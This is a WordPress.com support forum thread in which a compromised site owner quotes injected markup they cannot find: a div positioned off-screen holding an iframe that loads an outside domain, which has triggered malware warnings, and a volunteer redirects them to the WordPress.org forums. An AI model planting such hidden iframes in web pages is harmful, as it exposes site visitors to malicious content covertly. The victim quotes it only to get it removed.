Searching for malicious code on WordPress
-
Apologies if this has been asked and answered but I’ve been trawling this forum for a week and cannot find anything that solves my issue.
I recently discovered that my site had been accessed by someone other than myself. I’d noticed a weird iframe over my header that never generated but assumed it was an ad gone awry and that it would resolve itself in time. Soon readers were contacting me saying they couldn’t access my site because of ‘malware warnings’ so I implemented some security measures, discovered I’d been under ‘brute force attack’ and tried to stop further access.
That’s all fine and I seem to have cracked keeping them out but I’ll be damned if I can get rid of that iframe. I asked my ad agent if they could help and they sent me a screen shot of the coding that was causing the issue but I have no idea where to find it within wordpress. I’ve looked through every individual folder (I think – it’s hard to keep up, there are so many) but no luck.
If any of you can advise ANYTHING I will be eternally grateful. I’m a total noob but trying!
FYI the code I’m searching for is:
<div class=”textwidget”><div style=’width: 300px; height: 300px; position: absolute; left:-500px; top: -500px;’>
<iframe src=’http://wordpresscache.net/’ width=’250′ height=’250′></iframe>
</div>
The blog I need help with is: (visible only to logged in users)
-
As that site cannot be hosted here by WordPress.COM, our support docs do not relate to it, and we cannot provide support for it. You are posting to the wrong support forum. You are referring to a WordPress>ORG site.
WordPress.COM and WordPress.ORG are completely separate and have different username accounts, logins, features, run different versions of some themes with the same names, and have separate support documentation and separate support forums. Read the differences here http://en.support.wordpress.com/com-vs-org/
If you don’t have a username account at WordPress.ORG account, then click http://wordpress.org/support/ and register one on the top right hand corner of the page that opens, https://wordpress.org/support/register.php so you can post to the support forums there.
Resetting your WordPress.ORG password http://codex.wordpress.org/Resetting_Your_Password
WordPress.org support docs are at https://codex.wordpress.org/Main_Page -
Sorry! I have no idea how I ended up here.. I started out on .org, signed in and must have been redirected. I will repost elsewhere!
-
- The topic ‘Searching for malicious code on WordPress’ is closed to new replies.
WordPress.com Forums 